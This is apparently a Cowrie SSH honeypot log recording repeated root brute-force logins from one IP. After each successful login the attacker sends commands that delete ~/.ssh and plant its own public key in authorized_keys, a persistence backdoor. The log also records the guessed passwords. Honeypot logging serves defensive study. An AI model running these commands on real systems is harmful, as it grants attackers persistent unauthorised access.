{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:14:57.447069Z","src_ip":"212.227.235.229","session":"9836635ac63b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:14:59.229614Z","src_ip":"212.227.235.229","session":"9836635ac63b"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:59.485073Z","src_ip":"212.227.235.229","session":"3272452b50ea"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:14:59.486254Z","src_ip":"212.227.235.229","session":"9836635ac63b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40776,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddb2faae37ae","protocol":"ssh","message":"New connection: 212.227.235.229:40776 (1.2.3.4:22) [session: ddb2faae37ae]","sensor":"my-vps","timestamp":"2025-09-08T22:15:05.030802Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:15:05.031472Z","src_ip":"212.227.235.229","session":"ddb2faae37ae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:15:05.340329Z","src_ip":"212.227.235.229","session":"ddb2faae37ae"}
{"eventid":"cowrie.login.success","username":"root","password":"Sy123456","message":"login attempt [root/Sy123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:15:06.617680Z","src_ip":"212.227.235.229","session":"ddb2faae37ae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:15:07.253949Z","src_ip":"212.227.235.229","session":"ddb2faae37ae"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:15:07.254731Z","src_ip":"212.227.235.229","session":"ddb2faae37ae"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:15:07.255603Z","src_ip":"212.227.235.229","session":"ddb2faae37ae"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:07.565489Z","src_ip":"212.227.235.229","session":"ddb2faae37ae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:15:08.292089Z","src_ip":"212.227.235.229","session":"ddb2faae37ae"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:15:08.292810Z","src_ip":"212.227.235.229","session":"ddb2faae37ae"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:15:08.603354Z","src_ip":"212.227.235.229","session":"ddb2faae37ae"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:08.604317Z","src_ip":"212.227.235.229","session":"ddb2faae37ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40782,"dst_ip":"1.2.3.4","dst_port":22,"session":"4755fc22f973","protocol":"ssh","message":"New connection: 212.227.235.229:40782 (1.2.3.4:22) [session: 4755fc22f973]","sensor":"my-vps","timestamp":"2025-09-08T22:15:08.802108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:15:08.803015Z","src_ip":"212.227.235.229","session":"4755fc22f973"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:15:09.056898Z","src_ip":"212.227.235.229","session":"4755fc22f973"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:15:10.107725Z","src_ip":"212.227.235.229","session":"4755fc22f973"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:11.362466Z","src_ip":"212.227.235.229","session":"4755fc22f973"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40798,"dst_ip":"1.2.3.4","dst_port":22,"session":"be2616d820b7","protocol":"ssh","message":"New connection: 212.227.235.229:40798 (1.2.3.4:22) [session: be2616d820b7]","sensor":"my-vps","timestamp":"2025-09-08T22:15:11.723908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:15:11.724561Z","src_ip":"212.227.235.229","session":"be2616d820b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:15:12.033457Z","src_ip":"212.227.235.229","session":"be2616d820b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52342,"dst_ip":"1.2.3.4","dst_port":22,"session":"565acd554ab6","protocol":"ssh","message":"New connection: 212.227.235.229:52342 (1.2.3.4:22) [session: 565acd554ab6]","sensor":"my-vps","timestamp":"2025-09-08T22:15:12.420142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:15:12.421824Z","src_ip":"212.227.235.229","session":"565acd554ab6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:15:12.605716Z","src_ip":"212.227.235.229","session":"565acd554ab6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:15:13.309033Z","src_ip":"212.227.235.229","session":"be2616d820b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51512,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ff7d32fbe4f","protocol":"ssh","message":"New connection: 212.227.235.229:51512 (1.2.3.4:22) [session: 4ff7d32fbe4f]","sensor":"my-vps","timestamp":"2025-09-08T22:15:13.371774Z"}
{"eventid":"cowrie.login.success","username":"root","password":"hosting","message":"login attempt [root/hosting] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:15:13.380883Z","src_ip":"212.227.235.229","session":"565acd554ab6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:15:13.403218Z","src_ip":"212.227.235.229","session":"4ff7d32fbe4f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:13.619123Z","src_ip":"212.227.235.229","session":"be2616d820b7"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:13.620268Z","src_ip":"212.227.235.229","session":"ddb2faae37ae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:15:13.684883Z","src_ip":"212.227.235.229","session":"4ff7d32fbe4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:15:13.811238Z","src_ip":"212.227.235.229","session":"565acd554ab6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:15:13.811979Z","src_ip":"212.227.235.229","session":"565acd554ab6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:15:13.813187Z","src_ip":"212.227.235.229","session":"565acd554ab6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:13.998515Z","src_ip":"212.227.235.229","session":"565acd554ab6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:15:14.383742Z","src_ip":"212.227.235.229","session":"565acd554ab6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:15:14.384460Z","src_ip":"212.227.235.229","session":"565acd554ab6"}
{"eventid":"cowrie.login.success","username":"root","password":"134679","message":"login attempt [root/134679] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:15:14.511852Z","src_ip":"212.227.235.229","session":"4ff7d32fbe4f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:15:14.570573Z","src_ip":"212.227.235.229","session":"565acd554ab6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:14.571493Z","src_ip":"212.227.235.229","session":"565acd554ab6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47178,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5533a10db60","protocol":"ssh","message":"New connection: 212.227.235.229:47178 (1.2.3.4:22) [session: f5533a10db60]","sensor":"my-vps","timestamp":"2025-09-08T22:15:14.732034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:15:14.732882Z","src_ip":"212.227.235.229","session":"f5533a10db60"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:15:14.907034Z","src_ip":"212.227.235.229","session":"f5533a10db60"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:15:14.966232Z","src_ip":"212.227.235.229","session":"4ff7d32fbe4f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:15:14.966895Z","src_ip":"212.227.235.229","session":"4ff7d32fbe4f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:15:14.967653Z","src_ip":"212.227.235.229","session":"4ff7d32fbe4f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:15:15.174434Z","src_ip":"212.227.235.229","session":"4ff7d32fbe4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:15:15.598213Z","src_ip":"212.227.235.229","session":"4ff7d32fbe4f"}
